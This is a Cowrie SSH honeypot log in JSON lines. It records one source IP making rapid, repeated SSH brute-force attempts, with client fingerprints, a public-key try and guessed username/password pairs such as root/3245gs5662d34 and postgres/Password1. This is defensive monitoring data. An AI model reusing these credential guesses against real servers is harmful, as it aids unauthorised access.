{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:08.866642Z","src_ip":"212.227.235.229","session":"fdfaba822537"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:08.974602Z","src_ip":"212.227.235.229","session":"fdfaba822537"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:58:09.443360Z","src_ip":"212.227.235.229","session":"fdfaba822537"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:09.553020Z","src_ip":"212.227.235.229","session":"dc0b4ce53205"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:09.554021Z","src_ip":"212.227.235.229","session":"fdfaba822537"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53962,"dst_ip":"1.2.3.4","dst_port":22,"session":"919957298821","protocol":"ssh","message":"New connection: 212.227.235.229:53962 (1.2.3.4:22) [session: 919957298821]","sensor":"my-vps","timestamp":"2025-09-09T01:58:13.834056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:58:13.835115Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T01:58:13.921111Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-09-09T01:58:14.094715Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:14.095308Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-09-09T01:58:14.183139Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:14.183786Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59870,"dst_ip":"1.2.3.4","dst_port":22,"session":"93528fe42808","protocol":"ssh","message":"New connection: 212.227.235.229:59870 (1.2.3.4:22) [session: 93528fe42808]","sensor":"my-vps","timestamp":"2025-09-09T01:58:21.531238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:21.532308Z","src_ip":"212.227.235.229","session":"93528fe42808"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:21.791630Z","src_ip":"212.227.235.229","session":"93528fe42808"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:22.872045Z","src_ip":"212.227.235.229","session":"93528fe42808"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:23.833899Z","src_ip":"212.227.235.229","session":"919957298821"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:24.132803Z","src_ip":"212.227.235.229","session":"93528fe42808"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40400,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd7afda05cd7","protocol":"ssh","message":"New connection: 212.227.235.229:40400 (1.2.3.4:22) [session: dd7afda05cd7]","sensor":"my-vps","timestamp":"2025-09-09T01:58:24.331755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:24.332551Z","src_ip":"212.227.235.229","session":"dd7afda05cd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:24.591149Z","src_ip":"212.227.235.229","session":"dd7afda05cd7"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:25.666381Z","src_ip":"212.227.235.229","session":"dd7afda05cd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37366,"dst_ip":"1.2.3.4","dst_port":22,"session":"09efbfbf3037","protocol":"ssh","message":"New connection: 212.227.235.229:37366 (1.2.3.4:22) [session: 09efbfbf3037]","sensor":"my-vps","timestamp":"2025-09-09T01:58:26.665272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:26.668137Z","src_ip":"212.227.235.229","session":"09efbfbf3037"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:26.925660Z","src_ip":"212.227.235.229","session":"dd7afda05cd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36514,"dst_ip":"1.2.3.4","dst_port":22,"session":"068c1ac01290","protocol":"ssh","message":"New connection: 212.227.235.229:36514 (1.2.3.4:22) [session: 068c1ac01290]","sensor":"my-vps","timestamp":"2025-09-09T01:58:27.493963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:27.494917Z","src_ip":"212.227.235.229","session":"068c1ac01290"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:27.577718Z","src_ip":"212.227.235.229","session":"068c1ac01290"}
{"eventid":"cowrie.login.failed","username":"vpnuser","password":"Password1","message":"login attempt [vpnuser/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:27.948741Z","src_ip":"212.227.235.229","session":"068c1ac01290"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58346,"dst_ip":"1.2.3.4","dst_port":22,"session":"c22aab408bf6","protocol":"ssh","message":"New connection: 212.227.235.229:58346 (1.2.3.4:22) [session: c22aab408bf6]","sensor":"my-vps","timestamp":"2025-09-09T01:58:28.235614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:28.236551Z","src_ip":"212.227.235.229","session":"c22aab408bf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:28.479157Z","src_ip":"212.227.235.229","session":"c22aab408bf6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:29.033310Z","src_ip":"212.227.235.229","session":"068c1ac01290"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:29.487260Z","src_ip":"212.227.235.229","session":"c22aab408bf6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:30.731180Z","src_ip":"212.227.235.229","session":"c22aab408bf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50042,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd069b631774","protocol":"ssh","message":"New connection: 212.227.235.229:50042 (1.2.3.4:22) [session: dd069b631774]","sensor":"my-vps","timestamp":"2025-09-09T01:58:45.721318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:45.722310Z","src_ip":"212.227.235.229","session":"dd069b631774"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:45.945777Z","src_ip":"212.227.235.229","session":"dd069b631774"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:46.880215Z","src_ip":"212.227.235.229","session":"dd069b631774"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:48.106127Z","src_ip":"212.227.235.229","session":"dd069b631774"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58524,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc2174649961","protocol":"ssh","message":"New connection: 212.227.235.229:58524 (1.2.3.4:22) [session: bc2174649961]","sensor":"my-vps","timestamp":"2025-09-09T01:58:53.315377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:58:53.316068Z","src_ip":"212.227.235.229","session":"bc2174649961"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:58:53.549457Z","src_ip":"212.227.235.229","session":"bc2174649961"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"Password","message":"login attempt [ftp2/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T01:58:54.519837Z","src_ip":"212.227.235.229","session":"bc2174649961"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:58:55.755919Z","src_ip":"212.227.235.229","session":"bc2174649961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41890,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fcb86777fe1","protocol":"ssh","message":"New connection: 212.227.235.229:41890 (1.2.3.4:22) [session: 2fcb86777fe1]","sensor":"my-vps","timestamp":"2025-09-09T01:59:10.863984Z"}
